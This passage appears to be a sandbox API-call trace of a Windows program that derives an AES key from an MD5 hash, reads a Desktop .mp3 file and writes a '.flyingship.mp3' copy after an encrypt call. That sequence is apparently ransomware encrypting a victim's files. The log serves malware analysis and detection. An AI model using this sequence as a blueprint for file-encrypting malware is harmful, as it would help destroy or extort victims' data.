Flags=0x0, Size=0x10) returned 0x9bd768 [0165.072] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0165.072] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0165.072] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0165.072] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0165.072] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0165.072] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.072] CryptCreateHash (in: hProv=0x9c0c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0165.072] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.072] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.072] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.072] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.072] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0165.072] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.073] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.073] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0165.073] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0165.073] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.073] CryptHashData (hHash=0x90af58, pbData=0x8dee70, dwDataLen=0x19, dwFlags=0x1) returned 1 [0165.073] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.073] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.073] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.073] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0165.073] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0165.073] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0165.073] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0165.073] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.073] CryptDeriveKey (in: hProv=0x9c0c00, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0165.073] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.073] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.073] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.073] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.073] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.073] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0165.073] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0165.073] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.073] CryptDestroyHash (hHash=0x90af58) returned 1 [0165.074] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.074] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.074] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.074] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.074] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.075] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oB O9kLZ7MPDb_Fa.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ob o9klz7mpdb_fa.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0165.075] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0165.075] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0165.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0165.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0165.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0165.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0165.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0165.075] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0165.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0165.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0165.075] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0165.075] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.075] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0165.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0165.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0165.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0165.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0165.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0165.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0165.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0165.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0165.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0165.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0165.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0165.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0165.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0165.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0165.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0165.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0165.076] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0165.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0165.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0165.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0165.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0165.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0165.076] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0165.076] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\oB O9kLZ7MPDb_Fa.flyingship.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ob o9klz7mpdb_fa.flyingship.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0165.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0165.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0165.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0165.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0165.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0165.078] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0165.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0165.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0165.078] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af18 | out: hHeap=0x8a0000) returned 1 [0165.078] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.078] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0165.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0165.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0165.078] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0165.078] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0165.078] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0xda2c, lpOverlapped=0x0) returned 1 [0165.081] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0165.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0165.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0165.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0165.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0165.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0165.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0165.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0165.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0165.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9e5190 | out: hHeap=0x8a0000) returned 1 [0165.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0165.082] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0165.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9e5190 | out: hHeap=0x8a0000) returned 1 [0165.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0165.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0165.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0165.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0165.082] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0165.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0165.082] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0165.082] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0165.368] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0165.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0165.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0165.368] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0165.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2708 [0165.368] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0165.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0165.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0165.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2858 [0165.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0165.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0165.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0165.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2898 [0165.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0165.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0165.369] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0165.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd6f0 [0165.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0165.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0165.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0165.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0165.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26f8 [0165.369] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xda2c) returned 0xa00600 [0165.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0165.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0165.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0165.370] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0165.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0165.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0165.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0165.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0165.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0165.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0165.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0165.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0165.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0165.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0165.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0165.370] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 1 [0165.370] TranslateMessage (lpMsg=0x87ee3c) returned 0 [0165.370] DispatchMessageW (lpMsg=0x87ee3c) returned 0x0 [0165.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0165.370] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0165.371] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87e4d8) returned 1 [0165.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0165.371] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0165.371] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0165.371] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0165.372] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0165.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0165.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0165.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0165.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0165.372] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0165.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0165.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0165.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0165.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0165.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0165.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0165.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0165.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0165.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0165.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0165.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0165.372] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0165.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0165.372] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0165.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0165.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2778 [0165.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0165.372] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0165.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0165.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0165.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda98 [0165.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0165.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0165.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0165.373] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0165.373] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) 